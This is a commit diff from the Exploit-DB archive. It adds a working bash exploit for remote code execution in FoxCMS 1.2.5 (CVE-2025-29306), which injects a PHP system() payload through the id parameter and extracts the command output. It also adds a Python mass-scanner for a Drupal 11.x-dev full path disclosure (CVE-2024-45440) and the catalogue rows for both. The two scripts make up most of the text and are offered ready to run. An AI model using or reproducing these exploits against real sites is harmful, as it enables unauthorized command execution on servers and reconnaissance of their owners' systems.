DB: 2025-04-20

3 changes to exploits/shellcodes/ghdb

FoxCMS 1.2.5 - Remote Code Execution  (RCE)

Drupal 11.x-dev - Full Path Disclosure
This commit is contained in:
Exploit-DB 2025-04-20 00:16:27 +00:00
parent 8ce497b2c8
commit 71bfc9b6c5
3 changed files with 164 additions and 0 deletions

View file

@ -0,0 +1,63 @@
# Date: 2025-04-17
# Exploit Title:
# Exploit Author: VeryLazyTech
# Vendor Homepage: https://www.foxcms.org/
# Software Link: https://www.foxcms.cn/
# Version: FoxCMS v.1.2.5
# Tested on: Ubuntu 22.04, Windows Server 2019
# CVE: CVE-2025-29306
# Website: https://www.verylazytech.com
#!/bin/bash
banner() {
cat <<'EOF'
______ _______ ____ ___ ____ ____ ____ ___ _____ ___ __
/ ___\ \ / / ____| |___ \ / _ \___ \| ___| |___ \ / _ \___ / / _ \ / /_
| | \ \ / /| _| __) | | | |__) |___ \ __) | (_) ||_ \| | | | '_ \
| |___ \ V / | |___ / __/| |_| / __/ ___) | / __/ \__, |__) | |_| | (_) |
\____| \_/ |_____| |_____|\___/_____|____/ |_____| /_/____/ \___/ \___/
__ __ _ _____ _
\ \ / /__ _ __ _ _ | | __ _ _____ _ |_ _|__ ___| |__
\ \ / / _ \ '__| | | | | | / _` |_ / | | | | |/ _ \/ __| '_ \
\ V / __/ | | |_| | | |__| (_| |/ /| |_| | | | __/ (__| | | |
\_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_|
|___/ |___/
@VeryLazyTech - Medium
EOF
}
# Call the banner function
banner
set -e
# Check for correct number of arguments
if [ "$#" -ne 2 ]; then
printf "Usage: $0 <url> <command>"
exit 1
fi
TARGET=$1
# Encode payload
ENCODED_CMD=$(python3 -c "import urllib.parse; print(urllib.parse.quote('\${@print_r(@system(\"$2\"))}'))")
FULL_URL="${TARGET}?id=${ENCODED_CMD}"
echo "[*] Sending RCE payload: $2"
HTML=$(curl -s "$FULL_URL")
# Extract <ul> from known XPath location using xmllint
UL_CONTENT=$(echo "$HTML" | xmllint --html --xpath "/html/body/header/div[1]/div[2]/div[1]/ul" - 2>/dev/null)
# Strip tags, clean up
CLEANED=$(echo "$UL_CONTENT" | sed 's/<[^>]*>//g' | sed '/^$/d' | sed 's/^[[:space:]]*//')
echo
echo "[+] Command Output:"
echo "$CLEANED"

99
exploits/php/webapps/52266.py Executable file
View file

@ -0,0 +1,99 @@
#!/usr/bin/env python
# Exploit Title: Drupal 11.x-dev - Full Path Disclosure
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
# Version: 11.x-dev
# CVE: CVE-2024-45440
# -*- coding:UTF-8 -*-
import re
import requests
def banners():
cve_id = "CVE-2024-45440"
description = "Drupal 11.x-dev Full Path Disclosure Vulnerability: " \
"core/authorize.php allows Full Path Disclosure (even
when error logging is None) " \
"if the value of hash_salt is file_get_contents of a file
that does not exist."
disclaimer = "This tool is for educational purposes only. Any misuse of
this information is the responsibility of " \
"the person utilizing this tool. The author assumes no
responsibility or liability for any misuse or " \
"damage caused by this program."
width = 100
banner_top_bottom = "=" * width
banner_middle = f"{cve_id:^{width}}\n\n{description:^{width}}"
banner =
f"{banner_top_bottom}\n\n{banner_middle}\n\n{disclaimer}\n\n{banner_top_bottom}"
return banner
def scan_single_url(url=None):
if url is None:
print("[+] Input the IP/Domain Example: 127.0.0.1 or 127.0.0.1:8080")
url = input("[+] IP/Domain: ")
if not url.startswith('https://') and not url.startswith('http://'):
full_url = 'http://' + url + '/core/authorize.php'
print("[*] Scanning...")
try:
headers = {
"Host": url,
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64;
rv:133.0) Gecko/20100101 Firefox/133.0",
"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
}
response = requests.get(full_url, headers,timeout=10)
pattern = r'<em class="placeholder">(/.*?settings\.php)'
matches = re.findall(pattern, response.text)
# print(response.text)
if 'settings.php' in response.text:
print(f"[+] {url} Existed!")
for match in matches:
print("[+] The full path is:", match)
return True
else:
print(f"[-] {url} Not Exist!")
return False
except TimeoutError:
print(f"[-] {url} Timeout!")
except Exception as e:
print(f"[-] {url} Failed!")
return False
def scan_multiple_urls():
print("[+] Input the path of txt Example: ./url.txt or
C:\\the\\path\\to\\url.txt")
url_path = input("[+] Path: ")
url_list = []
result_list = []
try:
with open(url_path, 'r', encoding='utf-8') as f:
lines = f.readlines()
for line in lines:
url_list.append(line.strip())
except FileNotFoundError as e:
print("[-] File Not Found!")
for url in url_list:
result = scan_single_url(url)
if result:
result_list.append(url)
print("[+] Successful Target:")
for result in result_list:
print(f"[+] {result}")
def main():
print(banners())
print("[1] Scan single url\n[2] Scan multiple urls")
choice = input("[+] Choose: ")
if choice == '1':
scan_single_url()
elif choice == '2':
scan_multiple_urls()
else:
print("[-] Invalid option selected!")
pass
if __name__ == '__main__':
main()

View file

@ -11963,6 +11963,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49600,exploits/multiple/webapps/49600.rb,"FortiLogger 4.4.2.2 - Unauthenticated Arbitrary File Upload (Metasploit)",2021-03-01,"Berkan Er",webapps,multiple,,2021-03-01,2021-03-01,1,CVE-2021-3378,,,,, 49600,exploits/multiple/webapps/49600.rb,"FortiLogger 4.4.2.2 - Unauthenticated Arbitrary File Upload (Metasploit)",2021-03-01,"Berkan Er",webapps,multiple,,2021-03-01,2021-03-01,1,CVE-2021-3378,,,,,
50759,exploits/multiple/webapps/50759.txt,"Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS)",2022-02-18,"Braiant Giraldo Villa",webapps,multiple,,2022-02-18,2022-02-18,0,CVE-2021-43062,,,,, 50759,exploits/multiple/webapps/50759.txt,"Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS)",2022-02-18,"Braiant Giraldo Villa",webapps,multiple,,2022-02-18,2022-02-18,0,CVE-2021-43062,,,,,
51092,exploits/multiple/webapps/51092.sh,"FortiOS_ FortiProxy_ FortiSwitchManager v7.2.1 - Authentication Bypass",2023-03-27,"Felipe Alcantara",webapps,multiple,,2023-03-27,2023-03-27,0,CVE-2022-40684,,,,, 51092,exploits/multiple/webapps/51092.sh,"FortiOS_ FortiProxy_ FortiSwitchManager v7.2.1 - Authentication Bypass",2023-03-27,"Felipe Alcantara",webapps,multiple,,2023-03-27,2023-03-27,0,CVE-2022-40684,,,,,
52267,exploits/multiple/webapps/52267.bash,"FoxCMS 1.2.5 - Remote Code Execution (RCE)",2025-04-19,VeryLazyTech,webapps,multiple,,2025-04-19,2025-04-19,0,CVE-2025-29306,,,,,
11186,exploits/multiple/webapps/11186.txt,"FreePBX 2.5.1 - SQL Injection",2010-01-18,"Ivan Huertas",webapps,multiple,,2010-01-17,,1,OSVDB-61919,,CYBSEC-Advisory2010-0103-FreePBX_2_5_1_SQL_Injection.pdf,,, 11186,exploits/multiple/webapps/11186.txt,"FreePBX 2.5.1 - SQL Injection",2010-01-18,"Ivan Huertas",webapps,multiple,,2010-01-17,,1,OSVDB-61919,,CYBSEC-Advisory2010-0103-FreePBX_2_5_1_SQL_Injection.pdf,,,
11187,exploits/multiple/webapps/11187.txt,"FreePBX 2.5.x - Information Disclosure",2010-01-18,"Ivan Huertas",webapps,multiple,,2010-01-17,,1,OSVDB-61918,,CYBSEC-Advisory2010-0101-FreePBX_2_5_x_Information_disclosure.pdf,,, 11187,exploits/multiple/webapps/11187.txt,"FreePBX 2.5.x - Information Disclosure",2010-01-18,"Ivan Huertas",webapps,multiple,,2010-01-17,,1,OSVDB-61918,,CYBSEC-Advisory2010-0101-FreePBX_2_5_x_Information_disclosure.pdf,,,
11184,exploits/multiple/webapps/11184.txt,"FreePBX 2.5.x < 2.6.0 - Persistent Cross-Site Scripting",2010-01-18,"Ivan Huertas",webapps,multiple,,2010-01-17,,1,OSVDB-61920,,CYBSEC-Advisory2010-0102-FreePBX_2_5_x-2_6_Permanent_XSS.pdf,,, 11184,exploits/multiple/webapps/11184.txt,"FreePBX 2.5.x < 2.6.0 - Persistent Cross-Site Scripting",2010-01-18,"Ivan Huertas",webapps,multiple,,2010-01-17,,1,OSVDB-61920,,CYBSEC-Advisory2010-0102-FreePBX_2_5_x-2_6_Permanent_XSS.pdf,,,
@ -17546,6 +17547,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9635,exploits/php/webapps/9635.txt,"Drunken:Golem Gaming Portal - 'admin_news_bot.php' Remote File Inclusion",2009-09-10,"EA Ngel",webapps,php,,2009-09-09,,1,OSVDB-61856;CVE-2009-4622,,,,, 9635,exploits/php/webapps/9635.txt,"Drunken:Golem Gaming Portal - 'admin_news_bot.php' Remote File Inclusion",2009-09-10,"EA Ngel",webapps,php,,2009-09-09,,1,OSVDB-61856;CVE-2009-4622,,,,,
3207,exploits/php/webapps/3207.pl,"Drunken:Golem Portal 0.5.1 Alpha 2 - Remote File Inclusion",2007-01-27,MackRulZ,webapps,php,,2007-01-26,2016-09-27,1,OSVDB-36619;CVE-2007-0572,,,,http://www.exploit-db.comdrunkengolem_alpha2.zip, 3207,exploits/php/webapps/3207.pl,"Drunken:Golem Portal 0.5.1 Alpha 2 - Remote File Inclusion",2007-01-27,MackRulZ,webapps,php,,2007-01-26,2016-09-27,1,OSVDB-36619;CVE-2007-0572,,,,http://www.exploit-db.comdrunkengolem_alpha2.zip,
51723,exploits/php/webapps/51723.txt,"Drupal 10.1.2 - web-cache-poisoning-External-service-interaction",2023-09-08,nu11secur1ty,webapps,php,,2023-09-08,2023-09-08,0,,,,,, 51723,exploits/php/webapps/51723.txt,"Drupal 10.1.2 - web-cache-poisoning-External-service-interaction",2023-09-08,nu11secur1ty,webapps,php,,2023-09-08,2023-09-08,0,,,,,,
52266,exploits/php/webapps/52266.py,"Drupal 11.x-dev - Full Path Disclosure",2025-04-19,"Milad karimi",webapps,php,,2025-04-19,2025-04-19,0,CVE-2024-45440,,,,,
21863,exploits/php/webapps/21863.txt,"Drupal 4.0 - News Message HTML Injection",2002-09-25,das@hush.com,webapps,php,,2002-09-25,2012-10-09,1,CVE-2002-1806;OSVDB-59300,,,,,https://www.securityfocus.com/bid/5801/info 21863,exploits/php/webapps/21863.txt,"Drupal 4.0 - News Message HTML Injection",2002-09-25,das@hush.com,webapps,php,,2002-09-25,2012-10-09,1,CVE-2002-1806;OSVDB-59300,,,,,https://www.securityfocus.com/bid/5801/info
22940,exploits/php/webapps/22940.txt,"Drupal 4.1/4.2 - Cross-Site Scripting",2003-07-21,"Ferruh Mavituna",webapps,php,,2003-07-21,2012-11-27,1,,,,,,https://www.securityfocus.com/bid/8235/info 22940,exploits/php/webapps/22940.txt,"Drupal 4.1/4.2 - Cross-Site Scripting",2003-07-21,"Ferruh Mavituna",webapps,php,,2003-07-21,2012-11-27,1,,,,,,https://www.securityfocus.com/bid/8235/info
1088,exploits/php/webapps/1088.pl,"Drupal 4.5.3 < 4.6.1 - Comments PHP Injection",2005-07-05,dab,webapps,php,,2005-07-04,2016-05-25,1,OSVDB-17647;CVE-2005-2106,,,,http://www.exploit-db.comdrupal-4.5.3.zip, 1088,exploits/php/webapps/1088.pl,"Drupal 4.5.3 < 4.6.1 - Comments PHP Injection",2005-07-05,dab,webapps,php,,2005-07-04,2016-05-25,1,OSVDB-17647;CVE-2005-2106,,,,http://www.exploit-db.comdrupal-4.5.3.zip,

Can't render this file because it is too large.